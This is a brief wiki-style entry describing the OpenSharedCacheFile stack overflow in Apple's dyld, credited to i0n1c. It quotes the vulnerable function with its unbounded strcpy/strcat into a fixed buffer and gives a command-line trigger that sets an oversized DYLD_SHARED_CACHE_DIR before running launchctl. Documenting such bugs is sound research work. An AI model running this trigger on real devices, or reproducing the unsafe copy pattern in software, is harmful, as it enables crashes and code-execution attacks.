OpenSharedCacheFile

The OpenSharedCacheFile bug was found by i0n1c. This bug is a simple stack overflow.

Opensharedcachefile function
int openSharedCacheFile {  char path[1024]; strcpy(path, sSharedCacheDir); strcat(path, "/"); strcat(path, DYLD_SHARED_CACHE_BASE_NAME ARCH_NAME); return ::open(path, O_RDONLY); }

Triggering the vuln
To trigger it, run the following DYLD_SHARED_CACHE_DIR = “A” * 2000 \ DYLD_SHARED_REGION = private /bin/launchctl This will overflow the PC register making it a stack overflow.